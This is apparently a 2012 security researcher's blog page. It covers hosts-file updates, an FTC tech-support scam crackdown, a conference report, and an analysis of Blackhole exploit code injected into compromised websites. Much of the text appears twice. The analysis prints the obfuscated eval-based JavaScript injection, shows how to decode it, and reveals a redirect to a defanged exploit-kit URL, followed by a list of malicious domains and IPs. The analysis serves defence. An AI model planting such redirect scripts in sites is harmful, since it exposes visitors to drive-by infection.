I recently had an e-mail from Kyle at kcsoftwares.com, regarding his sites listing in hpHosts.
Sadly, OVH are still blocking my emails, and as he used OVH for his mail server, my reply to his email got blocked as well (blocked emails to OVH show as a timeout when attempting to send the email to addresses using their mail server - rather annoying given other mail servers at least send a rejection notice).
No idea if he reads this (probably not), but he doesn't have a contact form on his site, so figured this was the best option.
If you are reading this Kyle, the reason for the sites listing, is the adware (sponsor software) included in your programs installers. The fact there's an optional package available without this, is irrelevant.
Sunday, 7 October 2012
Friday, 5 October 2012
hpHosts Updated: 05/10/2012
The hpHOSTS Hosts file has been updated. There is now a total of 184,831 listed hostsnames.
If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
http://hosts-file.net/?s=Download
If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
- Latest Updated: 05/10/2012 23:15
- Last Verified: 04/10/2012 12:00
http://hosts-file.net/?s=Download
Thursday, 4 October 2012
FTC launches international crackdown on tech support scammers
The Federal Trade Commission has launched a major international crackdown on tech support scams in which telemarketers masquerade as major computer companies, con consumers into believing that their computers are riddled with viruses, spyware and other malware, and then charge hundreds of dollars to remotely access and “fix” the consumers’ computers.
At the request of the FTC, a U.S. District Court Judge has ordered a halt to six alleged tech support scams pending further hearings, and has frozen their assets.
“The FTC has been aggressive – and successful – in its pursuit of tech support scams,” said FTC Chairman Jon Leibowitz. “And the tech support scam artists we are talking about today have taken scareware to a whole other level of virtual mayhem.”
At the request of the FTC, a U.S. District Court Judge has ordered a halt to six alleged tech support scams pending further hearings, and has frozen their assets.
“The FTC has been aggressive – and successful – in its pursuit of tech support scams,” said FTC Chairman Jon Leibowitz. “And the tech support scam artists we are talking about today have taken scareware to a whole other level of virtual mayhem.”
Read more
http://www.ftc.gov/opa/2012/10/pecon.shtm
References
Called by 03339009119?
http://hphosts.blogspot.co.uk/2012/07/called-by-03339009119.html
Info: Ammyy now warning about telephony scams
http://blog.eset.com/2012/08/24/ammyy-warning-against-tech-support-scams
OfCom: Unsolicited Telesales Calls
http://consumers.ofcom.org.uk/tell-us/telecoms/privacy/
Note: OfCom URL updated as they seem to have taken down the original page on this
Telephony scams: Your machine told them it was infected? Really?
http://mysteryfcm.co.uk/?mode=Articles&date=18-01-2012
Malwarebytes: Telephony Scams: Can You Help?
http://blog.malwarebytes.org/news/2012/05/telephony-scams-can-you-help/
Eset: The Tech Support Scammer’s Revenge
http://blog.eset.com/2012/07/23/the-tech-support-scammers-revenge
Tuesday, 2 October 2012
Blackhole exploit: Compromised sites
Looking at a recent case of a compromised site, I noticed something rather surprising - they're not even bothering to try and make the code difficult to decode. I'm pondering of course, the thought that this is deliberate, due to the changes in v2.0 of the Blackhole exploit (others have already written about that [1] [2], so won't go into that here), but even if this is the case, the choice of using far less complex code on compromised sites, is puzzling to say the least.
In this case, the code inserted into the compromised site is (I've formatted it for readability)
To decode this, all you need to do, is modify it as follows;
Which gives us (I've disabled the URL, to prevent those that have links auto-hyperlinked);
In this case, onlinebayunator.ru is residing at;
70.38.31.71 - AS32613 70.38.0.0/17 IWEB-AS - iWeb Technologies Inc.
202.3.245.13 - AS9471 202.3.245.0/24 MANA-PF-AP MANA S.A.
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network
Other domains known to have (most are now thankfully, dead) or are, living on the IPs include;
hpHosts, Malware Domain List, Malwarebytes AntiMalware users will be pleased to know, the IPs/domains are already blocked.
Incidentally, onlinebayunator.ru was resolving to following yesterday (1st October), and nope, I'm not surprised to see CB3ROB' IP space making an appearance either;
84.22.100.108 - mail.cyberbunker.com - AS34109 84.22.96.0/19 AS34109 CB3ROB Ltd. & Co. KG
190.10.14.196 - cb9.creationsbank.com - AS3790 190.10.0.0/17 RADIOGRAFICA COSTARRICENSE
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network
References
Malware Domain List - Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=218.0
Malzilla (open source)
http://malzilla.sourceforge.net
In this case, the code inserted into the compromised site is (I've formatted it for readability)
v="v"+"a"+"l";
try
{
faweb++
}
catch(btawetb)
{
try
{
sbgesrb+325
}
catch(btawt4)
{
w=window;
e=w["e"+v];
}
}
if(1)
{
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}
try
{
faweb++
}
catch(btawetb)
{
try
{
sbgesrb+325
}
catch(btawt4)
{
w=window;
e=w["e"+v];
}
}
if(1)
{
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}
To decode this, all you need to do, is modify it as follows;
v="v"+"a"+"l";
e=eval;
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
e(s);
e=eval;
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
e(s);
Which gives us (I've disabled the URL, to prevent those that have links auto-hyperlinked);
var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}
In this case, onlinebayunator.ru is residing at;
70.38.31.71 - AS32613 70.38.0.0/17 IWEB-AS - iWeb Technologies Inc.
202.3.245.13 - AS9471 202.3.245.0/24 MANA-PF-AP MANA S.A.
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network
Other domains known to have (most are now thankfully, dead) or are, living on the IPs include;
adventiste.pf
anapoli.ru
ashanrestaurant.ru
atp.presidence.pf
bmwforummsk.ru
croixrouge.presidence.pf
denegnashete.ru
diareuomop.ru
dimabilanch.ru
etatsgeneraux.pf
flumifrator2unix.ru
forumanarhist.ru
furnitura-forums.ru
gorysevera.ru
ioponeslal.ru
ipadvssonyx.ru
kefrikin.ru
kerneloffce.ru
kolmykiaonline.ru
leprisoruim.ru
limonadiksec.ru
mazdaontours.ru
minweb.presidence.pf
mirdymas.ru
moskow-carsharing.ru
moskowpulkavo.ru
mskoblastionline.ru
myren.net.my
mysqlfordummys.ru
offshoremskk.ru
omahabeachs.ru
onerussiaboard.ru
onlinebayunator.ru
online-cammunity.ru
online-gaminatore.ru
panalki.ru
panamamoskow.ru
penelopochka.ru
phpforkiddies.ru
porschedesignrussia.ru
porscheforumspb.ru
presid.pf
presidence.gov.pf
presidence.pf
psg.presidence.pf
pussyriotss.ru
refonte.presidence.pf
rumyniaonline.ru
sectantes-x.ru
sergikgorec.ru
soisokdomen.ru
sonatanamore.ru
spb-koalitia.ru
switched-games.ru
uzoshkins.ru
zenedin-zidane.ru
anapoli.ru
ashanrestaurant.ru
atp.presidence.pf
bmwforummsk.ru
croixrouge.presidence.pf
denegnashete.ru
diareuomop.ru
dimabilanch.ru
etatsgeneraux.pf
flumifrator2unix.ru
forumanarhist.ru
furnitura-forums.ru
gorysevera.ru
ioponeslal.ru
ipadvssonyx.ru
kefrikin.ru
kerneloffce.ru
kolmykiaonline.ru
leprisoruim.ru
limonadiksec.ru
mazdaontours.ru
minweb.presidence.pf
mirdymas.ru
moskow-carsharing.ru
moskowpulkavo.ru
mskoblastionline.ru
myren.net.my
mysqlfordummys.ru
offshoremskk.ru
omahabeachs.ru
onerussiaboard.ru
onlinebayunator.ru
online-cammunity.ru
online-gaminatore.ru
panalki.ru
panamamoskow.ru
penelopochka.ru
phpforkiddies.ru
porschedesignrussia.ru
porscheforumspb.ru
presid.pf
presidence.gov.pf
presidence.pf
psg.presidence.pf
pussyriotss.ru
refonte.presidence.pf
rumyniaonline.ru
sectantes-x.ru
sergikgorec.ru
soisokdomen.ru
sonatanamore.ru
spb-koalitia.ru
switched-games.ru
uzoshkins.ru
zenedin-zidane.ru
hpHosts, Malware Domain List, Malwarebytes AntiMalware users will be pleased to know, the IPs/domains are already blocked.
Incidentally, onlinebayunator.ru was resolving to following yesterday (1st October), and nope, I'm not surprised to see CB3ROB' IP space making an appearance either;
84.22.100.108 - mail.cyberbunker.com - AS34109 84.22.96.0/19 AS34109 CB3ROB Ltd. & Co. KG
190.10.14.196 - cb9.creationsbank.com - AS3790 190.10.0.0/17 RADIOGRAFICA COSTARRICENSE
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network
References
Malware Domain List - Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=218.0
Malzilla (open source)
http://malzilla.sourceforge.net
Next hpHosts release, VB2012
As some of you know, I've been in the US for VB2012 and to visit the chaps and chapesses at the Malwarebytes HQ since September 24th, got back around mid-day on the 30th.
First and foremost, I'd like to say thank you to those involved in VB2012, as it was fantastic. Indeed, the only things I didn't like, were the bleedin heat (felt like I was melting), and the lack of both wifi and plug sockets on the planes (had never been out of the UK before, and was terrified of flying (still am - it's not normal!!)).
I also got to meet a living legend in Dallas - Alex Eckelberry, and Marcelo Rivero, amongst a plethora of others (I'm rubbish with names, so embarrasingly, can't remember the names of half of them).
The presentation I went to Dallas to do with David Harley (Eset), Martijn Grooten (Virus Bulletin) and Craig Johnston (Independent researcher, formerly Sophos), went well, despite the nerves getting the better of me (was not only my first flight, but my first presentation too).
On the subject of the presentation, one of the things we focused on, despite what the telephony scam was all about (for those that didn't already know), but also what could be done about it, and this included asking for more involvement, not only from the banks/financial institutions, law enforcement etc, but also from you - the security community, and most importantly, the public. If you'd like to get involved, please contact either myself, David, Craig or Martijn. The more help we can get, the better.
Due to being away, the hpHosts release was delayed, it is now due to be published on October 5th. As always, the partial update is available for those that would like to use it. The easiest method of doing this, is via programs such as HostsMan.
First and foremost, I'd like to say thank you to those involved in VB2012, as it was fantastic. Indeed, the only things I didn't like, were the bleedin heat (felt like I was melting), and the lack of both wifi and plug sockets on the planes (had never been out of the UK before, and was terrified of flying (still am - it's not normal!!)).
I also got to meet a living legend in Dallas - Alex Eckelberry, and Marcelo Rivero, amongst a plethora of others (I'm rubbish with names, so embarrasingly, can't remember the names of half of them).
The presentation I went to Dallas to do with David Harley (Eset), Martijn Grooten (Virus Bulletin) and Craig Johnston (Independent researcher, formerly Sophos), went well, despite the nerves getting the better of me (was not only my first flight, but my first presentation too).
On the subject of the presentation, one of the things we focused on, despite what the telephony scam was all about (for those that didn't already know), but also what could be done about it, and this included asking for more involvement, not only from the banks/financial institutions, law enforcement etc, but also from you - the security community, and most importantly, the public. If you'd like to get involved, please contact either myself, David, Craig or Martijn. The more help we can get, the better.
Due to being away, the hpHosts release was delayed, it is now due to be published on October 5th. As always, the partial update is available for those that would like to use it. The easiest method of doing this, is via programs such as HostsMan.
Subscribe to:
Posts (Atom)
Posts
